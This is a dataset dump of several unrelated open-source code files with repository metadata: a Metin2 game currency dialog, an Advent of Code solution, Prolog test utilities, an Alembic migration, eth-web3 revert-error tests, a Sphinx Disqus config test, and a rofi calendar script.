wndMgr.GetMousePosition()\n\n\t\t\tif mouseX + width/2 > wndMgr.GetScreenWidth():\n\t\t\t\txPos = wndMgr.GetScreenWidth() - width\n\t\t\telif mouseX - width/2 < 0:\n\t\t\t\txPos = 0\n\t\t\telse:\n\t\t\t\txPos = mouseX - width/2\n\n\t\t\tself.SetPosition(xPos, mouseY - self.GetHeight() - 20)\n\n\t\t\tself.maxValueTextLine.SetText(\" / \" + str(maxValue))\n\t\t\tself.maxValueTextLine2.SetText(\" / \" + str(maxValue2))\n\n\t\t\tself.pickValueEditLine.SetText(str(unitValue))\n\t\t\tself.pickValueEditLine.SetFocus()\n\t\t\t\n\t\t\tself.pickValueEditLine2.SetText(str(unitValue2))\n\t\t\tself.pickValueEditLine2.SetFocus()\n\n\t\t\time.SetCursorPosition(1)\n\t\t\t\n\t\t\t# rRCvfR4c_fL4e.AppendChat(rRCvfR4c_fL4e.CHAT_TYPE_INFO, \"unitValue:\"+str(unitValue)+\"unitValue2\"+str(unitValue2))\n\n\t\t\tself.unitValue = unitValue\n\t\t\tself.unitValue2 = unitValue2\n\t\t\tself.maxValue = maxValue\n\t\t\tself.maxValue2 = maxValue2\n\t\t\tself.Show()\n\t\t\tself.SetTop()\n\telse:\n\t\tdef Open(self, maxValue, unitValue=1):\n\n\t\t\tif localeInfo.IsYMIR() or localeInfo.IsCHEONMA() or localeInfo.IsHONGKONG():\n\t\t\t\tunitValue = \"\"\n\n\t\t\twidth = self.GetWidth()\n\t\t\t(mouseX, mouseY) = wndMgr.GetMousePosition()\n\n\t\t\tif mouseX + width/2 > wndMgr.GetScreenWidth():\n\t\t\t\txPos = wndMgr.GetScreenWidth() - width\n\t\t\telif mouseX - width/2 < 0:\n\t\t\t\txPos = 0\n\t\t\telse:\n\t\t\t\txPos = mouseX - width/2\n\n\t\t\tself.SetPosition(xPos, mouseY - self.GetHeight() - 20)\n\n\t\t\tif localeInfo.IsARABIC():\n\t\t\t\tself.maxValueTextLine.SetText(\"/\" + str(maxValue))\n\t\t\telse:\n\t\t\t\tself.maxValueTextLine.SetText(\" / \" + str(maxValue))\n\n\t\t\tself.pickValueEditLine.SetText(str(unitValue))\n\t\t\tself.pickValueEditLine.SetFocus()\n\n\t\t\time.SetCursorPosition(1)\n\n\t\t\tself.unitValue = unitValue\n\t\t\tself.maxValue = maxValue\n\t\t\tself.Show()\n\t\t\tself.SetTop()\n\n\tdef Close(self):\n\t\tself.pickValueEditLine.KillFocus()\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.pickValueEditLine2.KillFocus()\n\t\tself.Hide()\n\n\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\tdef OnAccept(self):\n\t\t\ttext = self.pickValueEditLine.GetText()\n\t\t\ttext2 = self.pickValueEditLine2.GetText()\n\n\t\t\t# rRCvfR4c_fL4e.AppendChat(rRCvfR4c_fL4e.CHAT_TYPE_INFO, \"text:\"+str(text)+\"text2\"+str(text2))\n\n\t\t\tif len(text) > 0 and text.isdigit() or len(text2) > 0 and text2.isdigit():\n\t\t\t\tmoney = long(text)\n\t\t\t\tmoney = min(money, self.maxValue)\n\t\t\t\tredcoin = int(text2)\n\t\t\t\tredcoin = min(redcoin, self.maxValue2)\n\n\t\t\t\tif money > 0 or redcoin > 0:\n\t\t\t\t\tif self.eventAccept:\n\t\t\t\t\t\tself.eventAccept(money, redcoin)\n\t\t\t\telse:\n\t\t\t\t\trRCvfR4c_fL4e.AppendChat(rRCvfR4c_fL4e.CHAT_TYPE_INFO, \"Bilgi: Lütfen bir deðer girin.\")\n\t\t\telse:\n\t\t\t\trRCvfR4c_fL4e.AppendChat(rRCvfR4c_fL4e.CHAT_TYPE_INFO, \"Bilgi: Lütfen bir deðer girin.\")\n\n\t\t\tself.Close()\n\telse:\n\t\tdef OnAccept(self):\n\n\t\t\ttext = self.pickValueEditLine.GetText()\n\n\t\t\tif len(text) > 0 and text.isdigit():\n\n\t\t\t\tmoney = long(text)\n\t\t\t\tmoney = min(money, self.maxValue)\n\n\t\t\t\tif money > 0:\n\t\t\t\t\tif self.eventAccept:\n\t\t\t\t\t\tself.eventAccept(money)\n\n\t\t\tself.Close()\n","repo_name":"fatihsahinn/Metin2-Coin-System","sub_path":"Python/uipickmoney.py","file_name":"uipickmoney.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18263189853","text":"import re\n\n# input_lines='''\\\n# aba[bab]xyz\n# xyx[xyx]xyx\n# aaa[kek]eke\n# zazbz[bzb]cdb'''.splitlines()\n\ninput_lines = open('input.txt')\n\ncount = 0\nfor line in input_lines:\n supernet = re.split(r'\\[\\w+\\]', line)\n hypernet = re.compile(r'\\[(\\w+)\\]').findall(line)\n for part in supernet:\n matches = re.compile(r'(?=(\\w)(\\w)\\1)').findall(part)\n found = False\n for match in matches:\n a, b = match\n bab = b + a + b\n if a != b and any(bab in h for h in hypernet):\n found = True\n break\n if found:\n count += 1\nprint(count)","repo_name":"ceronman/adventofcode","sub_path":"2016/day7/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"31420216576","text":"from collections.abc import Iterable\n\n\ndef assert_prolog_output_the_same(self, expected: list, actual: list, ignore_duplicates=False, nested_ignore=False):\n if len(expected) >= 2 and expected[-1] == \"false\":\n expected.pop()\n if len(actual) >= 2 and actual[-1] == \"false\":\n actual.pop()\n if ignore_duplicates and nested_ignore:\n comparison = compare_list_just_like_a_set_nested(expected, actual)\n self.assertTrue(comparison)\n return\n if ignore_duplicates:\n comparison = compare_list_just_like_a_set(expected, actual)\n self.assertTrue(comparison)\n return\n self.assertCountEqual(expected, actual)\n\n\ndef compare_list_just_like_a_set_nested(list1, list2):\n def comparator(x, y):\n if not isinstance(x, Iterable) or not isinstance(y, Iterable):\n return x == y\n return compare_list_just_like_a_set_nested(x, y)\n return compare_list_just_like_a_set(list1, list2, comparator)\n\n\ndef compare_list_just_like_a_set(list1, list2, comparator=(lambda x, y: x == y)):\n for item1 in list1:\n for item2 in list2:\n if comparator(item1, item2):\n break\n else:\n return False\n for item2 in list2:\n for item1 in list1:\n if comparator(item1, item2):\n break\n else:\n return False\n return True\n\n\n\ndef remove_duplicates(lst, nested_remove_duplicates=False):\n if not isinstance(lst, list):\n return lst\n\n ret = []\n for curr_lst in lst:\n if isinstance(curr_lst, list) and nested_remove_duplicates:\n curr_lst = remove_duplicates(curr_lst, nested_remove_duplicates=nested_remove_duplicates)\n for added in ret:\n if added == curr_lst:\n break\n else:\n ret.append(curr_lst)\n return ret\n\n\ndef remove_trailing_false_or_true(value):\n value = value[:]\n if len(value) == 0:\n return value\n if value[-1] in ('true', 'false'):\n value.pop()\n return value","repo_name":"Hzzkygcs/heizscheduler-prolog","sub_path":"python/HzzProlog/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21401142184","text":"\"\"\"Removing pure_org so I can re-create it correctly.\n\nRevision ID: 9f257b57fca6\nRevises: 8a1caca53d6c\nCreate Date: 2017-04-16 19:10:13.521359\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import oracle\n\n# revision identifiers, used by Alembic.\nrevision = '9f257b57fca6'\ndown_revision = '8a1caca53d6c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.drop_table('pure_org')\n\ndef downgrade():\n op.create_table(\n 'pure_org',\n sa.Column('id', sa.VARCHAR(length=50), nullable=False),\n sa.Column('type', sa.VARCHAR(length=25), nullable=True),\n sa.Column('name_en', sa.VARCHAR(length=255), nullable=True),\n sa.Column('level', oracle.NUMBER(scale=0, asdecimal=False), nullable=False),\n sa.Column('lft', oracle.NUMBER(scale=0, asdecimal=False), nullable=False),\n sa.Column('rgt', oracle.NUMBER(scale=0, asdecimal=False), nullable=False),\n sa.Column('parent_id', sa.VARCHAR(length=50), nullable=True),\n sa.Column('tree_id', oracle.NUMBER(scale=0, asdecimal=False), nullable=True),\n sa.Column('pure_id', sa.VARCHAR(length=50), nullable=False),\n sa.ForeignKeyConstraint(['parent_id'], ['pure_org.id'], name='SYS_C00281952'),\n sa.PrimaryKeyConstraint('id', name='sys_c00281951')\n )\n","repo_name":"UMNLibraries/experts_dw","sub_path":"alembic/versions/9f257b57fca6_removing_pure_org_so_i_can_re_create_it_.py","file_name":"9f257b57fca6_removing_pure_org_so_i_can_re_create_it_.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"30202722658","text":"import pytest\n\nfrom eth_web3._utils.method_formatters import (\n get_error_formatters,\n raise_solidity_error_on_revert,\n)\nfrom eth_web3._utils.rpc_abi import (\n RPC,\n)\nfrom eth_web3.exceptions import (\n ContractLogicError,\n)\nfrom eth_web3.types import (\n RPCResponse,\n)\n\n# OpenEthereum/default case:\nREVERT_WITH_MSG = RPCResponse(\n {\n \"jsonrpc\": \"2.0\",\n \"error\": {\n \"code\": -32015,\n \"message\": \"VM execution error.\",\n \"data\": (\n \"Reverted \"\n \"0x08c379a\"\n \"00000000000000000000000000000000000000000000000000000000000000020\"\n \"0000000000000000000000000000000000000000000000000000000000000016\"\n \"6e6f7420616c6c6f77656420746f206d6f6e69746f7200000000000000000000\"\n ),\n },\n \"id\": 2987,\n }\n)\n\nREVERT_WITHOUT_MSG = RPCResponse(\n {\n \"jsonrpc\": \"2.0\",\n \"error\": {\n \"code\": -32015,\n \"message\": \"VM execution error.\",\n \"data\": \"Reverted 0x\",\n },\n \"id\": 2987,\n }\n)\n\nOTHER_ERROR = RPCResponse(\n {\n \"jsonrpc\": \"2.0\",\n \"error\": {\n \"code\": -32601,\n \"message\": \"Method not found\",\n },\n \"id\": 1,\n }\n)\n\nGETH_RESPONSE = RPCResponse(\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"error\": {\n \"code\": 3,\n \"message\": \"execution reverted: Function has been reverted.\",\n \"data\": (\n \"0x08c379a0000000000000000000000000000000000000000000000\"\n \"0000000000000000020000000000000000000000000000000000000\"\n \"000000000000000000000000001b46756e6374696f6e20686173206\"\n \"265656e2072657665727465642e0000000000\"\n ),\n },\n }\n)\n\nGANACHE_RESPONSE = RPCResponse(\n {\n \"id\": 24,\n \"jsonrpc\": \"2.0\",\n \"error\": {\n \"message\": \"VM Exception while processing transaction: revert Custom revert message\", # noqa: E501\n \"code\": -32000,\n \"data\": {\n \"stack\": \"o: VM Exception while processing transaction: revert Custom revert message\\n\", # noqa: E501\n \"name\": \"o\",\n },\n },\n }\n)\n\n\n@pytest.mark.parametrize(\n \"response,expected\",\n (\n (REVERT_WITH_MSG, \"execution reverted: not allowed to monitor\"),\n (REVERT_WITHOUT_MSG, \"execution reverted\"),\n (GETH_RESPONSE, \"execution reverted: Function has been reverted.\"),\n (\n GANACHE_RESPONSE,\n \"execution reverted: VM Exception while processing transaction: revert Custom revert message\", # noqa: 501\n ),\n ),\n ids=[\n \"test-get-revert-reason-with-msg\",\n \"test-get-revert-reason-without-msg\",\n \"test-get-geth-revert-reason\",\n \"test_get-ganache-revert-reason\",\n ],\n)\ndef test_get_revert_reason(response, expected) -> None:\n with pytest.raises(ContractLogicError, match=expected):\n raise_solidity_error_on_revert(response)\n\n\ndef test_get_revert_reason_other_error() -> None:\n assert raise_solidity_error_on_revert(OTHER_ERROR) is OTHER_ERROR\n\n\ndef test_get_error_formatters() -> None:\n formatters = get_error_formatters(RPC.eth_call)\n with pytest.raises(ContractLogicError, match=\"not allowed to monitor\"):\n formatters(REVERT_WITH_MSG)\n with pytest.raises(ContractLogicError):\n formatters(REVERT_WITHOUT_MSG)\n assert formatters(OTHER_ERROR) == OTHER_ERROR\n","repo_name":"Foundation-Eth/eth-web3","sub_path":"tests/core/utilities/test_method_formatters.py","file_name":"test_method_formatters.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"94"} +{"seq_id":"3845976223","text":"\"\"\"Test disqus_shortname config value scenarios.\"\"\"\n\nimport re\n\nimport py\nimport pytest\nfrom _pytest.monkeypatch import MonkeyPatch\nfrom docutils.parsers.rst import directives, roles\nfrom sphinx import application, errors\n\nBASE_CONFIG = \"\"\"\\\nimport sys\nsys.path.append('{}')\nextensions = ['sphinx_disqus.disqus']\nmaster_doc = 'index'\nnitpicky = True\n\"\"\"\n\nPARAMS = [\n (\"disqus_shortname = 'good'\", \"\"),\n (\"\", \"disqus_shortname config value must be set for the disqus extension to work.\"),\n (\"disqus_shortname = ''\", \"disqus_shortname config value must be set for the disqus extension to work.\"),\n (\"disqus_shortname = 'B@D'\", \"disqus_shortname config value must be 3-50 letters, numbers, and hyphens only.\"),\n]\n\n\n@pytest.mark.parametrize(\"tail,expected_error\", PARAMS)\ndef test(monkeypatch: MonkeyPatch, tmpdir: py.path.local, tail: str, expected_error: str):\n \"\"\"Test valid and invalid values.\"\"\"\n tmpdir.join(\"conf.py\").write(BASE_CONFIG.format(py.path.local(__file__).join(\"..\", \"..\")))\n tmpdir.join(\"conf.py\").write(tail, mode=\"a\")\n tmpdir.join(\"index.rst\").write(\"====\\nMain\\n====\\n\\n.. toctree::\\n :maxdepth: 2\\n.. disqus::\")\n monkeypatch.setattr(directives, \"_directives\", getattr(directives, \"_directives\").copy())\n monkeypatch.setattr(roles, \"_roles\", getattr(roles, \"_roles\").copy())\n\n srcdir = confdir = str(tmpdir)\n outdir = tmpdir.join(\"_build\", \"html\")\n doctreedir = outdir.join(\"doctrees\").ensure(dir=True, rec=True)\n app = application.Sphinx(srcdir, confdir, str(outdir), str(doctreedir), \"html\")\n\n if not expected_error:\n app.builder.build_all()\n html_body = outdir.join(\"index.html\").read()\n disqus_div = re.findall(r'(]+ id=\"disqus_thread\"[^>]*>)', html_body)[0]\n assert 'data-disqus-shortname=\"good\"' in disqus_div\n return\n\n with pytest.raises(errors.ExtensionError) as exc:\n app.builder.build_all()\n assert expected_error == exc.value.args[0]\n","repo_name":"Robpol86/sphinx-disqus","sub_path":"tests/unit_tests/test_shortname.py","file_name":"test_shortname.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"94"} +{"seq_id":"33190941440","text":"#!/usr/bin/env python3\n\"\"\"\nA simple calendar made with rofi and python3.\n\nCycle through month and create linked event to days.\n\"\"\"\n\n__author__ = \"Daguhh\"\n__license__ = \"MIT-0\"\n__status__ = \"Released\"\n__version__ = \"2.0.1\"\n\nimport glob, os, sys, subprocess, shutil\nfrom pathlib import Path\nimport re, argparse, configparser\nimport datetime, calendar, locale\nfrom itertools import chain\nfrom functools import wraps\nimport time\n\n#START = time.time()\n\ndef get_arguments():\n \"\"\"Parse command line arguments\n\n Returns\n -------\n args : argparse.Namespace\n command line arguments\n unknown : str\n rofi output\n \"\"\"\n\n parser = argparse.ArgumentParser(\n prog=\"naivecalendar\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''A simple popup calendar\n\nsubcommands:\n update-themes Update a calendar parameter for all user themes at once\n add-event Add, modify, delete event in all user themes config at once\n configure Clone or open configuration files'''\n )\n\n parser.add_argument(\n '-V',\n '--version',\n action='version',\n version=\"%(prog)s \" + __version__\n )\n\n parser.add_argument(\n '-v',\n '--verbose',\n help=\"direct rofi error to stdout\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-p\",\n \"--print\",\n help=\"print date to stdout instead of opening a event\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-x\",\n \"--clipboard\",\n help=\"copy date to clipboard\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-f\",\n \"--format\",\n help=\"\"\"option '-p' or '-x' output format (datetime.strftime format, defaut='%%Y-%%m-%%d')\"\"\",\n dest=\"format\",\n default=\"%Y-%m-%d\",\n )\n\n parser.add_argument(\n \"-e\",\n \"--editor\",\n help=\"\"\"editor command to open events\"\"\",\n dest=\"editor\",\n default=\"xdg-open\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--locale\",\n help=\"\"\"force system locale, for example '-l es_ES.utf8'\"\"\",\n dest=\"locale\",\n default=\"\",\n )\n\n parser.add_argument(\n \"-c\",\n \"--read-cache\",\n dest=\"is_force_read_cache\",\n action=\"store_true\",\n help=\"\"\"force calendar to read old date from cache\"\"\"\n )\n\n parser.add_argument(\n \"-t\",\n \"--theme\",\n help=\"\"\"set calendar theme, default=classic_dark_extended (theme file name without extention)\"\"\",\n dest=\"theme\",\n default=False\n )\n\n parser.add_argument(\n \"-d\",\n \"--date\",\n help=\"\"\"display calendar at the given month, format='%%m-%%Y'\"\"\",\n dest=\"date\",\n default=False\n )\n\n args, unknown = parser.parse_known_args()\n unknown = unknown if len(unknown) == 0 else \"\".join(unknown).strip(' ')\n\n return args, unknown\n\n\n# get command line arguments and if exist : rofi output\nARGS, ROFI_OUTPUT = get_arguments()\n\n# Global var :\nEMPTY = -1\nROFI_RELOAD_TEMPO = 0.2\n\n######################\n### Path constants ###\n######################\nHOME = Path.home()\nDIRNAME = Path(__file__).parent.absolute()\n\n# cache files\nCACHE_PATH = HOME / \".cache/naivecalendar\"\nDATE_CACHE = CACHE_PATH / \"date_cache.ini\"\nPP_CACHE = CACHE_PATH / \"pretty_print_cache.txt\"\nTHEME_CACHE = CACHE_PATH / \"theme_cache.txt\"\nEVENT_CACHE = CACHE_PATH / \"event_cache.txt\"\n\n# config files\nCONFIG_PATH = HOME / \".config/naivecalendar\"\n\nTHEME_PATHS = {\n 'user' : CONFIG_PATH / \"themes\",\n 'rel' : DIRNAME / \"themes\"\n}\nSCRIPT_PATHS = {\n 'user' : CONFIG_PATH / \"scripts\",\n 'rel' : DIRNAME / \"scripts\"\n}\nEVENT_FILES = {\n 'user' : CONFIG_PATH / \"global/events.cfg\",\n 'rel' : DIRNAME / \"global/events.cfg\"\n}\nCUSTOM_ACTION_FILES = {\n 'user' : CONFIG_PATH / \"global/custom_actions.cfg\",\n 'rel' : DIRNAME / \"global/custom_actions.cfg\"\n}\n\n\n#######################################\n### load a theme configuration file ###\n#######################################\n\n# get wanted theme\ntheme = \"classic_dark_extended\"\nif ARGS.theme:\n theme = ARGS.theme\nelse:\n if THEME_CACHE.exists():\n with open(THEME_CACHE, 'r') as theme_cache:\n theme = theme_cache.read()\n\n# look for theme in config paths\nif (THEME_PATHS['user'] / f\"{theme}.cfg\").exists():\n theme_path = THEME_PATHS['user']\nelse:\n theme_path = THEME_PATHS['rel']\n\nTHEME_CONFIG_FILE = theme_path / f\"{theme}.cfg\"\nTHEME_RASI_FILE = theme_path / f\"{theme}.rasi\"\n\n\n########################\n### Load config file ###\n########################\n# -T-heme config\ncfg_t = configparser.ConfigParser(interpolation=None)\ncfg_t.read(THEME_CONFIG_FILE)\n\n# -E-vent config\ncfg_e = configparser.ConfigParser(interpolation=None)\nif EVENT_FILES['user'].exists():\n cfg_e.read(EVENT_FILES['user'])\nelif EVENT_FILES['rel'].exists():\n cfg_e.read(EVENT_FILES['rel'])\nelse:\n cfg_e['EVENTS'] = {'Notes' : '.naivecalendar_events/MyNotes/note_%Y-%m-%d.txt'}\n\n# custom -A-ction config\ncfg_a = configparser.ConfigParser(interpolation=None)\nif CUSTOM_ACTION_FILES['user'].exists():\n cfg_a.read(CUSTOM_ACTION_FILES['user'])\nelse:\n cfg_a.read(CUSTOM_ACTION_FILES['rel'])\n\n\n###########################\n### Get last event type ###\n###########################\ntry:\n with open(EVENT_CACHE, 'r') as event_cache:\n EVENTS_DEFAULT = event_cache.read()\n try :\n cfg_e['EVENTS'][EVENTS_DEFAULT]\n except KeyError:\n #print(f'no event \"{EVENTS_DEFAULT}\" found', file=sys.stderr)\n EVENTS_DEFAULT = ''\nexcept FileNotFoundError:\n #print(f'no event file \"{EVENT_CACHE}\" found', file=sys.stderr)\n EVENTS_DEFAULT = ''\n\n############################\n### Load user parameters ###\n############################\n\n# Some Functions\n################\n# Functions to parse list and int from configparser\ndef strip_list(lst):\n \"\"\"strip all element in a list\"\"\"\n return [x.strip() for x in lst]\n\ndef to_list(cfg_list):\n \"\"\"convert string with comma separated elements into python list\"\"\"\n # align all elements to right\n return [DAY_FORMAT.format(word) for word in cfg_list.split(',')]\n\ndef set_list(default, section, key, row):\n \"\"\"set, set default or desactivate given user config \"\"\"\n vals = section[key]\n if row == EMPTY: # don't display row\n return []\n elif vals == '': # use default vals\n return [DAY_FORMAT.format(s) for s in default]\n elif key == 'SYMS_DAYS_NUM':\n return to_list(vals)\n else: # parse config values\n return [CONTROL_MENU_ID[x.strip()] if x.strip() in CONTROL_MENU_ID.keys() else x for x in to_list(vals)]\n\n# def old_conf_file_compat(key):\n# dct = {\n# 'ROW_CONTROL_MENU' : 'ROW_BAR_1',\n# 'ROW_SHORTCUTS' : 'ROW_BAR_2',\n# 'SYMS_CONTROL_MENU' : 'SYMS_BAR_1',\n# 'SYMS_SHORTCUTS' : 'SYMS_BAR_2'\n# }\n#\n# return dct.setdefault(key, key)\n\ndef to_int(section, key):\n \"\"\"Convert a configparser entry into an int\"\"\"\n val = section[key]\n if val == '':\n val = EMPTY\n else:\n try:\n val = int(val)\n except ValueError as e:\n print(40*'*'+f\"\\nwarning : wrong value '{val}' for '{key}'.\\nShould be an interger or an empty value.\\n\"+40*'*', file=sys.stderr)\n raise e\n return val\n\ndef to_path(path_str, parent=HOME):\n \"\"\"make path relative to home or absolute\"\"\"\n\n path = Path(path_str)\n\n if path.is_absolute():\n return path\n else:\n return parent / path\n\n# week days symbols : can be changed by locale\ndef set_locale_n_week_day_names(arg_locale, user_locale, day_format, first_day_week, day_abbr_lenght):\n \"\"\" Set SYMS_WEEK_DAYS constante given command line argument \"\"\"\n\n if arg_locale: # locale overwrited by user\n locale.setlocale(locale.LC_ALL, arg_locale)\n else: # system locale\n locale.setlocale(locale.LC_ALL, user_locale)\n\n def get_loc_day(day_num, lenght):\n \"\"\"return locale day names truncated at lenght and titlized\"\"\"\n return locale.nl_langinfo(locale.DAY_1 + day_num)[:lenght].title()\n\n days_order = chain(range(first_day_week, 7), range(0, first_day_week))\n\n sym_week_days = [day_format.format(\n get_loc_day(day_num, day_abbr_lenght)\n ) for day_num in days_order]\n\n return sym_week_days\n\n# cfg_ture locate\n###################\nUSER_LOCALE = cfg_t['LOCALE'][\"USER_LOCALE\"] # use 'locale -a' on your system to list locales\n\n# Day names abbreviations\n#########################\nDAY_ABBR_LENGHT = int(cfg_t['DAY NAMES'][\"DAY_ABBR_LENGHT\"]) # ex : 3 => Mon\nDAY_FORMAT = '{:>' + str(max(DAY_ABBR_LENGHT,2)) + '}' # align symbols right\nFIRST_DAY_WEEK = int(cfg_t['DAY NAMES'][\"FIRST_DAY_WEEK\"]) # 0 = sunday, 1 = monday...\n\n# Day events configuration\n##########################\nEVENTS_PATHS = {n:to_path(cfg_e['EVENTS'][n]) for n in cfg_e['EVENTS']}\n# default date events folder to display\nEVENTS_DEFAULT = EVENTS_DEFAULT if EVENTS_DEFAULT != '' else next(EVENTS_PATHS.keys().__iter__()) #cfg['DEFAULT'].lower()\n\n# Rofi/Calendar shape\n#####################\nNB_COL = 7\nNB_WEEK = 6 # nb row of calendar \"days number\" part\n#NB_ROW = int(cfg_t['SHAPE']['NB_ROW'])\n\n# Calendar symbols and shortcuts\n################################\nSYM_NEXT_MONTH = to_list(cfg_t['CONTROL']['SYM_NEXT_MONTH'])\nSYM_NEXT_YEAR = to_list(cfg_t['CONTROL']['SYM_NEXT_YEAR'])\nSYM_PREV_MONTH = to_list(cfg_t['CONTROL']['SYM_PREV_MONTH'])\nSYM_PREV_YEAR = to_list(cfg_t['CONTROL']['SYM_PREV_YEAR'])\n\n# Shortcuts for popup windows\n#############################\nSYM_SHOW_EVENTS = to_list(cfg_t['SHORTCUTS']['SYM_SHOW_EVENTS'])\nSYM_SHOW_HELP = to_list(cfg_t['SHORTCUTS']['SYM_SHOW_HELP'])\nSYM_SWITCH_THEME = to_list(cfg_t['SHORTCUTS']['SYM_SWITCH_THEME'])\nSYM_SWITCH_EVENT = to_list(cfg_t['SHORTCUTS']['SYM_SWITCH_EVENT'])\nSYM_SHOW_MENU = to_list(cfg_t['SHORTCUTS']['SYM_SHOW_MENU'])\nSYM_GO_TODAY = to_list(cfg_t['SHORTCUTS']['SYM_GO_TODAY'])\n\n# Custom Functions\n##################\nCUSTOM_ACTIONS = {s:{'sym':to_list(cfg_a[s]['sym']), 'cmd':to_list(cfg_a[s]['cmd'])} for s in cfg_a.sections()}\n\n# Today header display\n######################\nPROMT_DATE_FORMAT = cfg_t['HEADER']['PROMT_DATE_FORMAT']\nIS_TODAY_HEAD_MSG = cfg_t.getboolean('HEADER', 'IS_TODAY_HEAD_MSG')\nIS_LOOP_TODAY_HEAD_MSG = cfg_t.getboolean('HEADER', 'IS_LOOP_TODAY_HEAD_MSG')\n\n# pango markup props\nTODAY_HEAD_MSG_TXT = cfg_t['HEADER']['TODAY_HEAD_MSG_TXT']\n\n# Calendar content and organisation\n###################################\n# row number where to display day symbols\nROW_DAY_NAMES = to_int(cfg_t['CONTENT'], 'ROW_DAY_NAMES')\n# symbols for week day names\n#_syms_week_days = to_list(cfg_t['CONTENT'][\"SYMS_WEEK_DAYS\"]) if not ROW_DAY_NAMES == EMPTY else []\nSYMS_WEEK_DAYS = set_locale_n_week_day_names(ARGS.locale, USER_LOCALE, DAY_FORMAT, FIRST_DAY_WEEK, DAY_ABBR_LENGHT)\n\n# row number where to display calendar first line\nROW_CAL_START = to_int(cfg_t['CONTENT'], 'ROW_CAL_START')\n# symbols for day numbers\n#default = (str(x) for x in range(1,32))\n#SYMS_DAYS_NUM= set_list(default, cfg_t['CONTENT'], 'SYMS_DAYS_NUM', ROW_CAL_START)\nSYMS_DAYS_NUM = [str(x) for x in range(1,32)]\n\n\nCONTROL_MENU_ID = {\n 'p' : SYM_PREV_MONTH[0],\n 'pp': SYM_PREV_YEAR[0],\n 'n' : SYM_NEXT_MONTH[0],\n 'nn': SYM_NEXT_YEAR[0],\n 'h' : SYM_SHOW_HELP[0],\n 't' : SYM_SWITCH_THEME[0],\n 'e' : SYM_SHOW_EVENTS[0],\n 's' : SYM_SWITCH_EVENT[0],\n 'm' : SYM_SHOW_MENU[0],\n 'bb': SYM_GO_TODAY[0],\n **{s:v['sym'][0] for s,v in CUSTOM_ACTIONS.items()}\n}\n\n# row number where to display buttons\nROW_BAR_1 = to_int(cfg_t['CONTENT'], 'ROW_BAR_1')\n# symbols for control menu row\ndefault = (s[0] for s in (SYM_PREV_YEAR, SYM_PREV_MONTH, ' ', SYM_SHOW_MENU, ' ', SYM_NEXT_MONTH, SYM_NEXT_YEAR))\nSYMS_BAR_1 = set_list(default, cfg_t['CONTENT'], 'SYMS_BAR_1', ROW_BAR_1)\n\n# row number where to display shortcuts buttons\nROW_BAR_2 = to_int(cfg_t['CONTENT'], 'ROW_BAR_2')\n# symbols to display in shortcuts row\ndefault = (s[0] for s in (SYM_SHOW_HELP, SYM_SWITCH_THEME, SYM_SHOW_EVENTS, SYM_SWITCH_EVENT, ' ', ' ', SYM_SHOW_MENU))\nSYMS_BAR_2 = set_list(default, cfg_t['CONTENT'], 'SYMS_BAR_2', ROW_BAR_2)\n\nNB_ROW = int(bool(SYMS_BAR_2)) + int(bool(SYMS_BAR_1)) + int(bool(SYMS_WEEK_DAYS)) + 6\n\n##############\n### Script ###\n##############\n\ndef main(args, rofi_output):\n \"\"\"Print calendar to stdout and react to rofi output\"\"\"\n\n # create event path n test rofi intall\n first_time_init()\n\n is_first_loop = not bool(rofi_output)\n if isinstance(rofi_output, str):\n out = DAY_FORMAT.format(rofi_output) # rofi strip blank character so reformat\n else:\n out = 'Nothing'\n\n cdate = CacheDate() # manage operation and writing to cache\n cdate = set_date(cdate, is_first_loop, args.is_force_read_cache, args.date)\n cdate, is_match = process_event_date(cdate, out, args)\n\n update_rofi(cdate.date, is_first_loop)\n cdate.write_cache()\n if not is_match: # don't test if out already match one condition in process_event_date\n process_event_popup(out, cdate)\n\n\ndef set_date(cdate, is_first_loop, is_force_read_cache, arg_date):\n \"\"\"set date given context\n\n (read cache, get today date or set date argument)\n\n Parameters\n ----------\n is_first_loop : bool\n true on first calendar call\n is_force_read_cache : bool\n force date from cache\n arg_date : str\n date in '%m%Y' format\n\n Returns\n -------\n CacheDate\n CacheDate object that contain the date to display\n \"\"\"\n\n if not is_first_loop or is_force_read_cache:\n cdate.read_cache() # read previous date\n elif is_first_loop and arg_date:\n cdate.set_month(arg_date) # command line force date\n else: # at first loop if no force option\n cdate.now()\n\n return cdate\n\n\ndef process_event_date(cdate, out, args):\n \"\"\"React to rofi output for \"date\" events\n\n Parameters\n ----------\n cdate : CacheDate\n current month\n out : str\n rofi output\n args : argparse.Namespace\n print, clipboard, format, editor arguments\n\n Returns\n -------\n CacheDate\n new month to display\n \"\"\"\n\n is_match = True\n out = out.strip()\n if out in strip_list(SYM_PREV_YEAR):\n cdate.year -= 1\n elif out in strip_list(SYM_PREV_MONTH):\n cdate.month -= 1\n elif out in strip_list(SYM_NEXT_MONTH):\n cdate.month += 1\n elif out in strip_list(SYM_NEXT_YEAR):\n cdate.year += 1\n elif out in strip_list(SYMS_DAYS_NUM):\n set_pp_date(out, cdate.date, args.format)\n if args.print or args.clipboard:\n sys.exit(0)\n else:\n open_event(out, cdate.date, args.editor)\n elif out 